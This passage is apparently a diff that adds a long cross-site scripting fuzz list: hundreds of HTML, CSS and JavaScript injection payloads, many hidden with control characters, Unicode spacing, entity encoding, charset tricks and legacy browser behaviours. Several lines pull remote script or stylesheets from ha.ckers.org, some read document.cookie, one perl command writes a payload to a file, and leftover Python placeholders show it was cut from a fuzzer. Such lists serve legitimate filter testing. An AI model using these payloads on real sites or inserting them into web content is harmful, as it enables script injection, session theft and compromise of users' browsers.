id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> 
+<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" 
id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> 
+"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input 
onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG 
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 